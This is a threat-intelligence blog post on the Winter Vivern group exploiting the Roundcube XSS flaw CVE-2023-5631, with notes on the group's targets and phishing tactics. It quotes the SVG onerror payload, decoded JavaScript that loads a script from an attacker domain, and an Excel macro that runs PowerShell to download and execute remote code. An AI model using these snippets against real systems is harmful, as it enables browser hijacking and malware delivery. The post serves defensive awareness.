(30/10/23) Blog 303 – Winter Vivern exploiting RoundCube email vulnerability
Roundcube, the popular opensource email service is being actively targeted by a threat actor who’s past attacks align themselves with the objectives of the Russian and Belarusian governments.
The threat actor is tracked as Winter Viven and has been seen exploiting a recent vulnerability in the RoundCube service’s which allows for Cross Site Script attacks (XSS) via a specifically crafted email message.
CVE-2023-5631
The vulnerability (CVE-2023-5631) can be exploited by sending an email containing a malicious value which has an encoded string. When the RoundCube email client attempts to decode the string, it incorrectly handles the decoded data, leading to exploitation.
In the example below, a seemingly benign HTML email message contains a tag at the bottom with an svg tag (SVG = Scalable Vector Graphic).
The HTML svg tag contains some data which needs to be processed:
<div><svg><use href="data:image/svg+xml;base64.PHNsZYBpZD*ieCI<******>#x"></div>
When the RoundCube client attempts to process the tag to identify and retrieve the image, it processes the base64 encoded information which causes an error – In this case, the id attribute has an invalid value of “x”.
<svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>
The system then passes the invalid data to the error-handling component which proceeds to decode the remaining base64 encoded data:
var fe=document.createElement('script');fe.src="https://recsecas[.]com/controlserver/checkupdate.js"; document.body.appendChild(fe);
This decoded javascript file is then processed in the context of the users browser, just achieving the XSS attack.
As such, by sending a specially crafted email message, the threat actors are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window.
No manual interaction other than viewing the message in a web browser is required.
RoundCude released an update to address this vulnerability on the 14th October, but many users have not updated their systems yet.
Who are Winter Viven?
Winter Vivern is an APT who has been tracked since early 2021, initially by DomainTools, but since then by many other security researchers and threat analysis groups.
Domain Tools initially observed the threat actor using a malicious Microsoft Excel macro which reached back from compromised victims in Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine, and the Vatican to a C2 server using a http domain string with WinterViven in the path – as seen below.
CALL("kernel32","WinExec","JCJ","powershell -c ""iex (New-Object Net.Webclient).DownloadString( 'https://secure-daddy[.]com/wintervivern/server/serverHttpRequest(RUN).txt')""",0)
More recently Winter Vivern has targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government. The APT has also been actively targeting private businesses, including telecommunications organizations that support Ukraine in the ongoing war.
Social Engineering tactics
Winter Vivern’s tactics typically include the use of malicious documents, often generated by copying authentic government documents which are publicly available or by creating ones tailored to specific themes.
More recently, the group has started mimicking government domains to distribute malicious downloads.
Earlier this year, Winter Vivern targeted specific government websites by creating individual pages on a single malicious domain that closely resembled those of Poland’s Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Security Service of Ukraine
